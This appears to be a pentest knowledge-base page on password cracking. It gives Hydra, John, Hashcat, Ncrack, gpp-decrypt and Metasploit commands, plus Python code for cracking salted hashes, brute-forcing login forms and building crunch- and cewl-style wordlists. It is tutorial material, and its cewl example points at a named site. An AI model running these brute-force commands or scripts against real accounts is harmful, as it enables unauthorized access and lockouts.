Book of Eopi
Password cracking

Password cracking is the process of using a program to recover an unknown or forgotten password for a computer or network resource, either offline (against a captured hash) or online (by submitting guesses to a live login).


Last updated 2 years ago

Passwords can be brute-forced (iterating through every letter/number combination), but a dictionary attack is usually far more efficient. In Kali, wordlists live in /usr/share/wordlists: fasttrack.txt is a short list of common weak passwords and rockyou.txt is the large general-purpose list (it ships compressed as rockyou.txt.gz on a fresh install, so gunzip it first). Many applications and services are installed with default passwords, so always check for those before attempting to crack anything.

Identifying hashes

Passwords are usually stored hashed in databases, sometimes with a salt. If the database/application stores a salt alongside the hash, you'll need to do some research to figure out how it is combined with the password before hashing. It might be concatenated with the password (salt + password or password + salt), or the result may be hashed more than once (md5(md5(password)) is common in older PHP applications). Get the scheme wrong and a correct guess will never match, so when you can, confirm it against an account whose password you already know.

Identifying hashes with hash-identifier (it guesses from the length and character set, so a 32-character hex string could be MD5 or NTLM among others; treat the answer as a hint rather than proof):

hash-identifier
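The salt problem above is easier to see in code. The following is an added example (not code from the original page, and not how hash-identifier or John work internally): it guesses the algorithm from the digest length the same way hash-identifier does, then tries each plausible salt scheme against a wordlist until one reproduces the stored hash. The salt, wordlist and "database" hash are constructed for the demo; the hash is computed inline as sha256(salt + password) to stand in for a value read out of a real table.

```python
"""Offline cracking of a salted hash when the salt scheme is unknown.

Added example, not code from the original page. The salt, wordlist and
'database row' below are constructed; the row was built as
sha256(salt + password) with password 'Summer2019'.
"""
from __future__ import annotations

import hashlib
from typing import Callable, Iterable, Optional

# Candidate ways an application might combine salt and password before hashing.
# Each takes (password, salt) as bytes and returns the bytes that get digested.
SCHEMES: dict[str, Callable[[bytes, bytes], bytes]] = {
    "salt+password": lambda p, s: s + p,
    "password+salt": lambda p, s: p + s,
    "password only": lambda p, s: p,
    # Double hashing as some PHP apps do: hex(md5(password)) with the salt appended.
    "md5(password)+salt": lambda p, s: hashlib.md5(p).hexdigest().encode() + s,
}

# Hex digest length -> plausible algorithms. This is the same heuristic
# hash-identifier uses, so MD5 and NTLM (both 32 hex chars) cannot be told apart.
LENGTH_TO_ALGOS = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}


def guess_algorithms(hex_hash: str) -> list[str]:
    """Return hashlib algorithm names whose hex digest length matches the input."""
    if not hex_hash or any(c not in "0123456789abcdefABCDEF" for c in hex_hash):
        return []
    return LENGTH_TO_ALGOS.get(len(hex_hash), [])


def crack(hex_hash: str, salt: str, wordlist: Iterable[str]) -> Optional[tuple[str, str, str]]:
    """Try every (algorithm, salt scheme, word) combination.

    Returns (algorithm, scheme, password) for the first match, or None when
    the wordlist is exhausted. Iterating schemes in the outer loop means a
    wrong salt assumption costs one extra pass rather than a missed password.
    """
    target = hex_hash.lower()
    salt_b = salt.encode()
    words = list(wordlist)
    for algo in guess_algorithms(target):
        for scheme, combine in SCHEMES.items():
            for word in words:
                if hashlib.new(algo, combine(word.encode(), salt_b)).hexdigest() == target:
                    return algo, scheme, word
    return None


# Constructed sample data: a salt and a tiny wordlist standing in for rockyou.
SAMPLE_SALT = "x9Qp"
SAMPLE_WORDLIST = ["password", "123456", "letmein", "Summer2019", "qwerty"]
# Simulates the value read from the database column (salt + password, SHA-256).
SAMPLE_HASH = hashlib.sha256(b"x9QpSummer2019").hexdigest()

if __name__ == "__main__":
    print(crack(SAMPLE_HASH, SAMPLE_SALT, SAMPLE_WORDLIST))   # ('sha256', 'salt+password', 'Summer2019')
```

Once the scheme is known, hand the real job to John or Hashcat with the matching format; the point of the script is to settle which format that is before burning GPU hours on the wrong one.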

John the Ripper

John is useful for offline password cracking: it takes a text file of hashes (one per line, optionally as user:hash) and tries a wordlist against them.

Usage:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 /root/Desktop/john.txt

The --format option is not always necessary as john does a decent job of guessing, but when several formats share a digest length (Raw-MD5 and NT, for example) john picks one and only warns about the rest, so set it explicitly when the hash is ambiguous. See john's list of supported formats for the exact names.

Hydra

Hydra is a command-line tool for online password attacks against services such as website login pages and SSH. The options can be tricky, so Burp Intruder is an alternative for websites: pass it the HTTP request string captured through Burp's proxy. However, Intruder seems to have trouble loading large wordlists such as rockyou.

Websites

General format for website attacks. The http-post-form argument has three colon-separated fields: the path, the form body with ^USER^ and ^PASS^ placeholders, and a condition. A bare third field (or F=...) is a string that appears on failed logins; S=... is a string that appears only on success. Check the string against a real failed login (and a real successful one, if you have an account) before trusting the results, or every guess will look like a hit or a miss.

hydra -L <username list> -P <password list> [host] http-post-form "<path>:<form parameters>:<failed login message>"

Attack the DVWA login page:

hydra -L <username list> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

Attack a WordPress login page with a known username, using a success condition (S=, matching the redirect to wp-admin that only a valid login produces) instead of a failure message, with verbose output:

hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V

JSON and APIs

It's a pain, but you can send JSON bodies and match on the responses with Hydra. You just have to escape every " and : in the JSON message, because : is Hydra's field separator:

hydra -l [username] -P /usr/share/wordlists/fasttrack.txt [host] https-post-form "/api/account/login:{\"email\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:S=userInfo" -V

Hydra sends the body with a form-encoded content type by default; if the API rejects that, add a header field such as H=Content-Type\: application/json after the condition.

Because of throttling and API lockouts, you may want to use Burp Intruder instead: it shows every server response, so a rate-limit or lockout reply (which Hydra would count as just another failed guess) is visible. Check the target's lockout policy first; a naive run can lock out every account you test and turn the engagement into a denial of service.
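To make the three-field semantics concrete, here is an added example (not code from the original page, and not hydra's own code) that implements the same http-post-form logic in a few functions: placeholder substitution, an S=/F= condition evaluated against status line, headers and body, and a stop-on-success loop that treats HTTP 429 as throttling to wait out rather than as a failed guess. The target, a local demo login with a constructed account and a 429 on every fourth request, is started only when the file is run as a script; its path, field names, credentials and throttling behaviour are assumptions for the demo.

```python
"""A minimal http-post-form brute forcer mirroring hydra's semantics.

Added example, not part of the original page or of hydra. The target is a
constructed local demo server (started only when run as a script); its
login path, field names, valid credentials and throttling are assumptions.
"""
from __future__ import annotations

import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Callable, Iterable, Optional

Response = tuple[int, dict[str, str], str]   # status, headers, decoded body


def build_body(template: str, user: str, password: str) -> str:
    """Fill hydra's ^USER^ / ^PASS^ placeholders, URL-encoding the values so
    an '&' or '=' inside a password cannot break the form encoding."""
    return (template.replace("^USER^", urllib.parse.quote_plus(user))
                    .replace("^PASS^", urllib.parse.quote_plus(password)))


def check_passed(condition: str, response: Response) -> bool:
    """Evaluate the third http-post-form field: 'S=text' succeeds when text is
    present; 'F=text' or a bare string succeeds when text is absent. Like
    hydra, headers are searched too, so a redirect Location can be matched."""
    status, headers, body = response
    haystack = f"HTTP/1.1 {status}\n" + "\n".join(f"{k}: {v}" for k, v in headers.items()) + "\n" + body
    if condition.startswith("S="):
        return condition[2:] in haystack
    marker = condition[2:] if condition.startswith("F=") else condition
    return marker not in haystack


def brute_force(send: Callable[[str], Response], template: str, condition: str,
                user: str, passwords: Iterable[str], backoff: float = 1.0) -> Optional[str]:
    """Try each password and stop at the first success. An HTTP 429 means the
    target is throttling: wait and retry the same guess rather than counting
    it as a failed login and silently losing that candidate."""
    for password in passwords:
        body = build_body(template, user, password)
        while True:
            response = send(body)
            if response[0] != 429:
                break
            time.sleep(backoff)
        if check_passed(condition, response):
            return password
    return None


def http_sender(url: str) -> Callable[[str], Response]:
    """Return a send() that POSTs a form body to url without following
    redirects, because the 302 itself is often the success signal."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    opener = urllib.request.build_opener(NoRedirect)

    def send(body: str) -> Response:
        req = urllib.request.Request(url, data=body.encode(), method="POST",
                                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with opener.open(req) as resp:
                return resp.status, dict(resp.headers), resp.read().decode()
        except urllib.error.HTTPError as err:   # 3xx/4xx/5xx still carry the signal
            return err.code, dict(err.headers), err.read().decode()
    return send


class DemoLogin(BaseHTTPRequestHandler):
    """Constructed target: one valid account, and a 429 on every fourth request."""
    attempts = 0

    def do_POST(self):
        DemoLogin.attempts += 1
        form = urllib.parse.parse_qs(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode())
        if DemoLogin.attempts % 4 == 0:
            self.send_response(429); self.end_headers(); self.wfile.write(b"Too many attempts")
        elif form.get("username") == ["admin"] and form.get("password") == ["Summer2019"]:
            self.send_response(302); self.send_header("Location", "/admin/"); self.end_headers()
        else:
            self.send_response(200); self.end_headers(); self.wfile.write(b"Login failed")

    def log_message(self, *args):   # keep the demo output to the result line
        pass


if __name__ == "__main__":
    server = ThreadingHTTPServer(("127.0.0.1", 0), DemoLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    login_url = f"http://127.0.0.1:{server.server_address[1]}/login"
    found = brute_force(http_sender(login_url), "username=^USER^&password=^PASS^&Login=Login",
                        "S=Location: /admin/", "admin",
                        ["password", "123456", "letmein", "Summer2019"], backoff=0.2)
    print("found:", found)   # found: Summer2019
    server.shutdown()
```

The 429 handling is the part hydra lacks: with a fixed failure string, a throttled reply contains no "Login failed" text and would be reported as a valid password, while a lockout page that does contain the text would quietly swallow the correct guess. Matching on the redirect header (S=Location: /admin/) is the same trick as the WordPress command above.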

SSH

General usage:

hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh

SSH with a non-standard port (22022):

hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh

SSH with a username wordlist, non-standard port, limited threads (SSH daemons drop connections under high parallelism, so -t 4 is the usual choice) and verbose output:

hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4 -v

Hashcat

Hashcat is a very fast password-cracking tool (GPU-accelerated where a driver is available) with many supported formats. General usage:

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force

  • -m is the hash mode (0 is MD5; 13100 is Kerberos 5 TGS-REP etype 23; hashcat --help lists the rest)

  • -a 0 is a straight dictionary attack

  • -o cracked.txt is the output file for the cracked hash:password pairs

  • target_hashes.txt holds the hashes to be cracked, one per line

  • /usr/share/wordlists/rockyou.txt is the path to the wordlist

  • --force ignores hashcat's warnings, usually about an unsupported or outdated OpenCL driver. It is commonly needed in a Kali VM without GPU passthrough, but it can hide real driver problems, so read the warning before adding it

Ncrack

Ncrack can be used to brute-force RDP (and other network service) passwords:

ncrack -vv --user username -P password-file.txt rdp://[host]

GPP-decrypt

Group Policy Preferences (GPP) were used in the past to let Windows administrators create domain policies with embedded credentials. These policies allowed administrators to set local account passwords, embed credentials for mapping drives, or perform other tasks that would otherwise require a password in a script. Unfortunately, the password stored in the policy (the cpassword attribute) is encrypted with a known key that Microsoft published, meaning anyone who can read the GPP can obtain the plaintext password. Since GPPs are stored on the domain controller in the SYSVOL share, at a minimum every domain user can read the encrypted credentials.

Once you find and download Groups.xml (or one of the other preference files that carry a cpassword, such as ScheduledTasks.xml, Services.xml, Drives.xml or DataSources.xml), extract the value of the cpassword attribute and pass it to gpp-decrypt:

gpp-decrypt [cpassword]

The value is base64-encoded ciphertext, not a hash: gpp-decrypt does not crack anything, it simply decrypts with the published key.

MySQL brute force

With Metasploit:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts [target]
msf auxiliary(mysql_login) > set rport [port]
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

Apache Tomcat brute force

With Metasploit:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts [target]
msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080 for HTTP or 8443 for HTTPS]
msf auxiliary(tomcat_mgr_login) > set ssl true
msf auxiliary(tomcat_mgr_login) > set stop_on_success true
msf auxiliary(tomcat_mgr_login) > run

Set ssl true only when the manager is served over HTTPS (typically 8443); for plain HTTP on 8080 leave it at its default of false, or every request will fail with a TLS error. By default, Metasploit uses its built-in lists of default Tomcat usernames and passwords (tomcat:tomcat and the like, which are still found in the wild), but you can set a single username with set username, supply your own list with set user_file, and a longer password list with set pass_file. If the server responds quickly you can afford a big wordlist; otherwise stick to fasttrack.txt.

Custom wordlists

Custom wordlists are useful when targeting a specific organization or individual, because words tied to the target (company and product names, founding year, local sports teams) produce far more relevant password candidates than a generic list.

Crunch

Crunch generates custom password lists that can be used to guess passwords, such as:

  • All combinations for a number of letters.

  • All combinations for a range of characters followed by static text.

  • Password lists based on default password ranges (default router passwords for example).

General usage:

crunch [min length] [max length] [charset] [options]

Generate a password list with all 26^4 = 456,976 combinations of 4 capital letters. Lists grow exponentially (8 lowercase letters is already over 200 billion lines), so for large keyspaces pipe crunch's standard output straight into john or hashcat instead of writing it to disk with -o:

crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ -o /root/Desktop/wordlist.txt

Generate a list with all combinations for 5 digits:

crunch 5 5 0123456789 -o /root/Desktop/wordlist.txt

Generate a wordlist with all combinations of four letters from the charset followed by the literal text 1980. With -t, each @ is a placeholder filled from the charset and every other character is copied as-is (crunch also accepts , for uppercase, % for digits and ^ for symbols); the min and max length must both equal the pattern length, 8 here:

crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o /root/Desktop/wordlist.txt

The -p option takes a list of words (or characters) and outputs every permutation of them, so each word appears exactly once per line and nothing repeats. The min and max lengths are ignored in this mode but must still be supplied.

Generate all orderings of the words Dog, Cat and Mouse (3! = 6 lines, e.g. DogCatMouse):

crunch 1 2 -p Dog Cat Mouse -o /root/Desktop/wordlist.txt
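The three crunch modes above map onto three small generators. This is an added example, not crunch's code and not from the original page; it reproduces the charset enumeration, the -t pattern (including the , % ^ placeholders the page only mentions in passing) and the -p permutation mode, plus a size estimate so you can see how big a list will be before writing it. The output ordering of the permutation mode is not guaranteed to match crunch's.

```python
"""Generate wordlists the way crunch does (added example, not crunch's code).

Covers the three uses on this page: full charset enumeration between a
minimum and maximum length, a -t pattern with @ placeholders and static
text, and -p permutations of whole words.
"""
from __future__ import annotations

import itertools
from typing import Iterable, Iterator

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
DIGITS = "0123456789"
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "   # crunch's default symbol set


def charset_words(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    """crunch <min> <max> <charset>: every string of each length, in charset order."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def pattern_words(pattern: str, charset: str = LOWER) -> Iterator[str]:
    """crunch -t: '@' positions take values from charset, ',' uppercase,
    '%' digits, '^' symbols; every other character is copied literally."""
    classes = {"@": charset, ",": UPPER, "%": DIGITS, "^": SYMBOLS}
    slots = [classes.get(c, c) for c in pattern]   # a literal is a one-char "charset"
    for combo in itertools.product(*slots):
        yield "".join(combo)


def permutation_words(words: Iterable[str]) -> Iterator[str]:
    """crunch -p: each output line uses every word exactly once, in every order."""
    for combo in itertools.permutations(list(words)):
        yield "".join(combo)


def count_and_size(words: Iterator[str]) -> tuple[int, int]:
    """Number of lines and bytes (newlines included) a list occupies on disk,
    the figure to check before pointing -o at a small VM's disk."""
    lines = size = 0
    for word in words:
        lines += 1
        size += len(word) + 1
    return lines, size


if __name__ == "__main__":
    print(count_and_size(charset_words(4, 4, UPPER)))            # (456976, 2284880)
    print(next(pattern_words("@@@@1980", UPPER)))                 # AAAA1980
    print(list(permutation_words(["Dog", "Cat", "Mouse"])))       # 6 entries
```

To feed a cracker directly, iterate the generator and write to the cracker's stdin (e.g. a subprocess running hashcat or john --stdin) instead of materialising the list; that is the Python equivalent of piping crunch's stdout.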

Cewl

Cewl scrapes websites for text to generate a custom password list.

Options:

  • -m is the minimum word length for words to save to the wordlist.

  • -d is the maximum depth the spider is allowed to scrape.

  • -o is offsite, used to allow the spider to leave the current website to another website.

  • -w is write to output file, specify the output file here.

Example: run Cewl against a site (here https://www.loliteam.net), collecting words of 8 letters or more and spidering one level deep:

cewl -d 1 -m 8 -w /root/Desktop/cewl.txt https://www.loliteam.net
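The -m, -d and -o options are easiest to understand by building the spider they control. Below is an added example (not cewl's code and not from the original page): a breadth-first crawler over a constructed in-memory site that applies a minimum word length, a link-depth limit and a same-host restriction that offsite mode lifts, and counts word frequency the way cewl's -c does. The site, its URLs and its text are made up for the demo; replacing fetch() with an HTTP GET turns it into a crawler of a real host.

```python
"""A cewl-style word spider (added example, not cewl's own code).

Pages come from a constructed in-memory site so the example runs offline;
swap fetch() for urllib to crawl a real host. Implements -m (min word
length), -d (depth) and -o (offsite), with hit counting like cewl's -c.
"""
from __future__ import annotations

import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

START = "https://www.example-corp.test/"

# Constructed site: four internal pages and one link to another host.
SITE = {
    START: """<html><head><title>Example Corp</title></head>
      <body><p>Welcome to ExampleCorp, makers of the Quantumwidget since 1998.</p>
      <a href="/about">About</a> <a href="/team/">Team</a>
      <a href="https://partner.example.net/">Partner</a></body></html>""",
    START + "about": """<html><body><p>Our Quantumwidget division is led by
      engineer Henrietta Blackwood.</p><a href="/careers">Careers</a></body></html>""",
    START + "team/": "<html><body><p>Meet the Quantumwidget team: Henrietta.</p></body></html>",
    START + "careers": "<html><body><p>Join ExampleCorp: password hygiene required.</p></body></html>",
    "https://partner.example.net/": "<html><body><p>Partnership announcement: Quantumwidget resellers.</p></body></html>",
}


class TextAndLinks(HTMLParser):
    """Collect visible text and href targets, ignoring script/style content."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True
        if tag == "a":
            self.links.extend(value for name, value in attrs if name == "href" and value)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def fetch(url: str) -> str | None:
    """Stand-in for an HTTP GET against the constructed SITE."""
    return SITE.get(url)


def spider(start: str, depth: int = 2, min_len: int = 3, offsite: bool = False) -> Counter:
    """Breadth-first crawl up to `depth` link hops from `start`; returns a
    Counter of words of at least `min_len` letters. Without offsite, links
    to other hosts are dropped, as cewl does unless -o is given."""
    host = urlparse(start).netloc
    seen, frontier, words = {start}, [(start, 0)], Counter()
    while frontier:
        url, level = frontier.pop(0)
        html = fetch(url)
        if html is None:
            continue
        parser = TextAndLinks()
        parser.feed(html)
        words.update(w for w in re.findall(r"[A-Za-z]+", " ".join(parser.text)) if len(w) >= min_len)
        if level >= depth:
            continue
        for href in parser.links:
            target = urljoin(url, href)
            if not offsite and urlparse(target).netloc != host:
                continue
            if target not in seen:
                seen.add(target)
                frontier.append((target, level + 1))
    return words


def wordlist(counter: Counter) -> list[str]:
    """Unique words ordered by frequency, the shape cewl writes with -w."""
    return [w for w, _ in counter.most_common()]


if __name__ == "__main__":
    print(wordlist(spider(START, depth=1, min_len=8)))   # Quantumwidget first
```

Words that recur across pages (product names, people) float to the top of the list, which is why cewl output is worth sorting by count before feeding it to Hydra: the first few hundred lines carry most of the value.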
